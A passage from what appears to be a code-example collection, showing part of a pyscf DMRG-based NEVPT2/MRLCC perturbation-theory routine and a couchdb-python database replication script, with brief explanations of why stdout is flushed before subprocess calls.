            dm1 = numpy.einsum('ijkj', dm2)/(nelec-1)
            dm1eff += dm1

    #now add the contribution due to the current root
    dm3 = mc.fcisolver.make_rdm3(state=root, norb=mc.ncas, nelec=mc.nelecas, dt=float_precision)    
    nelec = mc.nelecas[0]+mc.nelecas[1]
    dm2 = numpy.einsum('ijklmk', dm3)/(nelec-2)
    dm1 = numpy.einsum('ijkj', dm2)/(nelec-1)
    dm1eff += dm1
    dm1eff = dm1eff/(1.0*nroots)
    import os
    os.system("mkdir int")    
    numpy.save("int/E3",dm3)
    numpy.save("int/E3B.npy", dm3.transpose(0,3,1,4,2,5))
    numpy.save("int/E3C.npy", dm3.transpose(5,0,2,4,1,3))
    del dm3

    #back up the RestartReorder file to _1. this is because responseaaav and responseaaac both overwrite this file;
    #this means that when we want to restart a calculation after, say, responseaaav didn't finish, the new calculations
    #would otherwise use the RestartReorder file written by the incomplete responseaaav run instead of the original dmrg run.
    reorderf1 = "%s/node0/RestartReorder.dat_1"%(mc.fcisolver.scratchDirectory)
    reorderf = "%s/node0/RestartReorder.dat"%(mc.fcisolver.scratchDirectory)
    import os.path
    reorder1present = os.path.isfile(reorderf1) 
    if (reorder1present):
        from subprocess import check_call
        output = check_call("cp %s %s"%(reorderf1, reorderf), shell=True)
    else :
        from subprocess import check_call
        check_call("cp %s %s"%(reorderf, reorderf1), shell=True)
    reorder = numpy.loadtxt("%s/node0/RestartReorder.dat"%(mc.fcisolver.scratchDirectory))


    if (pttype == "NEVPT2") :
        norbs, energyE0 = writeNevpt2Integrals(mc, dm1, dm2, dm1eff, AAAVsplit, frozen)
        sys.stdout.flush()
        print "wrote the integrals to disk"

        for k in range(AAAVsplit):
            writeDMRGConfFile(mc.nelecas[0], mc.nelecas[1], mc.ncore, mc.ncas,  norbs,
                              mc.fcisolver, PTM, "AAAV", mc.fcisolver.memory, mc.fcisolver.num_thrds, reorder, fciExtraLine, aaavsplit=AAAVsplit, aaavIter=k, root=root, name = "NEVPT2")
        writeDMRGConfFile(mc.nelecas[0], mc.nelecas[1], mc.ncore-frozen, mc.ncas,  norbs-frozen,
                          mc.fcisolver, PTM, "AAAC", mc.fcisolver.memory, mc.fcisolver.num_thrds, reorder, fciExtraLine,root=root, name = "NEVPT2")
        sys.stdout.flush()

        totalE = 0.0;
        totalE += executeNEVPT(nelec, mc.ncore, mc.ncas, frozen, mc.fcisolver.memory)# executeMRLCC(nelec, mc.ncore, mc.ncas)

        try:
            for k in range(AAAVsplit):
                outfile, infile = "responseNEVPT2_aaav%d.out"%(k), "responseNEVPT2_aaav%d.conf"%(k)
                output = check_call("%s  %s  %s > %s"%(mc.fcisolver.mpiprefix, mc.fcisolver.executable, infile, outfile), shell=True)
                file1 = open("%s/node0/dmrg.e"%(mc.fcisolver.scratchDirectory),"rb")
                import struct
                energy = struct.unpack('d', file1.read(8))[0]
                file1.close()
                totalE += energy
                print "perturber AAAV%i --  %18.9e"%(k, energy)
                sys.stdout.flush()

            if (mc.ncore-frozen != 0):
                outfile, infile = "responseNEVPT2_aaac.out", "responseNEVPT2_aaac.conf"
                output = check_call("%s  %s  %s > %s"%(mc.fcisolver.mpiprefix, mc.fcisolver.executable, infile, outfile), shell=True)
                file1 = open("%s/node0/dmrg.e"%(mc.fcisolver.scratchDirectory),"rb")
                energy = struct.unpack('d', file1.read(8))[0]
                file1.close()
                totalE += energy
                print "perturber AAAC --  %18.9e"%(energy)

        except ValueError:
            print(output)

        from subprocess import check_call
        return totalE
    else :
        #this is a bad way to do it, the problem is
        #that pyscf works with double precision and
        #
        #energyE0 = writeMRLCCIntegrals(mc, dm1, dm2)
        #sys.stdout.flush()
        energyE0, norbs = writeNumpyforMRLCC(mc, dm1, dm2, frozen) 
        sys.stdout.flush()
        writeDMRGConfFile(mc.nelecas[0], mc.nelecas[1], mc.ncore, mc.ncas,  norbs,
                          mc.fcisolver, PTM, "AAAV", mc.fcisolver.memory, mc.fcisolver.num_thrds, reorder, fciExtraLine, root=root, name="MRLCC")
        writeDMRGConfFile(mc.nelecas[0], mc.nelecas[1], mc.ncore-frozen, mc.ncas,  norbs-frozen,
                          mc.fcisolver, PTM, "AAAC", mc.fcisolver.memory, mc.fcisolver.num_thrds, reorder, fciExtraLine, root=root, name="MRLCC")
        totalE = 0.0
        totalE +=  executeMRLCC(nelec, mc.ncore, mc.ncas, frozen, mc.fcisolver.memory)
        from subprocess import check_call
        try:
            outfile, infile = "responseMRLCC_aaav0.out", "responseMRLCC_aaav0.conf"
            output = check_call("%s  %s  %s > %s"%(mc.fcisolver.mpiprefix, mc.fcisolver.executable, infile, outfile), shell=True)
            file1 = open("%s/node0/dmrg.e"%(mc.fcisolver.scratchDirectory),"rb")
            import struct
            energy = struct.unpack('d', file1.read(8))[0]
            file1.close()
            totalE += energy
            print "perturber AAAV --  %18.9e"%(energy)
        except ValueError:
            print "perturber AAAV -- NA"
            #exit()

        try:
            if (mc.ncore-frozen != 0):
                outfile, infile = "responseMRLCC_aaac.out", "responseMRLCC_aaac.conf"
                output = check_call("%s  %s  %s > %s"%(mc.fcisolver.mpiprefix, mc.fcisolver.executable, infile, outfile), shell=True)
                file1 = open("%s/node0/dmrg.e"%(mc.fcisolver.scratchDirectory),"rb")
                energy = struct.unpack('d', file1.read(8))[0]
                file1.close()
                totalE += energy
                print "perturber AAAC --  %18.9e"%(energy)
        except ValueError:
            print "perturber AAAC -- NA"

        print "total PT  -- %18.9e"%(totalE)
        return totalE
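
A recurring detail in this example is the sys.stdout.flush() right before handing control to an external program via check_call: without it, the parent's buffered prints can appear after the child's output when both are redirected to the same log. A small stand-alone sketch of that ordering concern (run_step and the child command are illustrative, not taken from pyscf):

import subprocess
import sys

def run_step(label, cmd):
    """Announce a step, flush, then run a subprocess that shares our stdout.
    Flushing first keeps the announcement ahead of the child's output in a log."""
    print("running %s" % label)
    sys.stdout.flush()
    subprocess.check_call(cmd)

run_step("child process", [sys.executable, "-c", "print('hello from the child')"])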

Example 50

Project: couchdb-python Source File: replicate.py
def main():

    usage = '%prog [options] <source> <target>'
    parser = optparse.OptionParser(usage=usage)
    parser.add_option('--continuous',
        action='store_true',
        dest='continuous',
        help='trigger continuous replication in couchdb')
    parser.add_option('--compact',
        action='store_true',
        dest='compact',
        help='compact target database after replication')

    options, args = parser.parse_args()
    if len(args) != 2:
        raise parser.error('need source and target arguments')

    # set up server objects

    src, tgt = args
    sbase, spath = findpath(parser, src)
    source = client.Server(sbase)
    tbase, tpath = findpath(parser, tgt)
    target = client.Server(tbase)

    # check database name specs

    if '*' in tpath:
        raise parser.error('invalid target path: must be single db or empty')

    all = sorted(i for i in source if i[0] != '_') # Skip reserved names.
    if not spath:
        raise parser.error('source database must be specified')

    sources = [i for i in all if fnmatch.fnmatchcase(i, spath)]
    if not sources:
        raise parser.error("no source databases match glob '%s'" % spath)

    if len(sources) > 1 and tpath:
        raise parser.error('target path must be empty with multiple sources')
    elif len(sources) == 1:
        databases = [(sources[0], tpath)]
    else:
        databases = [(i, i) for i in sources]

    # do the actual replication

    for sdb, tdb in databases:

        start = time.time()
        print(sdb, '->', tdb)
        sys.stdout.flush()

        if tdb not in target:
            target.create(tdb)
            sys.stdout.write("created")
            sys.stdout.flush()

        sdb = '%s%s' % (sbase, util.urlquote(sdb, ''))
        if options.continuous:
            target.replicate(sdb, tdb, continuous=options.continuous)
        else:
            target.replicate(sdb, tdb)
        print('%.1fs' % (time.time() - start))
        sys.stdout.flush()

    if options.compact:
        for (sdb, tdb) in databases:
            print('compact', tdb)
            target[tdb].compact()
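
The replication loop prints each source/target pair as it starts and the elapsed time when it finishes, flushing both so progress is visible while the remaining databases are still being replicated. A compact sketch of that per-item progress pattern (replicate_all and the sleep-based stand-in for replication are assumptions, not couchdb-python API):

import sys
import time

def replicate_all(pairs, replicate):
    """Run replicate(src, dst) for each pair, reporting start and duration."""
    for sdb, tdb in pairs:
        start = time.time()
        print('%s -> %s' % (sdb, tdb))
        sys.stdout.flush()  # show which database is in flight before the slow call
        replicate(sdb, tdb)
        print('%.1fs' % (time.time() - start))
        sys.stdout.flush()

replicate_all([('db_a', 'db_a_copy'), ('db_b', 'db_b_copy')],
              lambda src, dst: time.sleep(0.1))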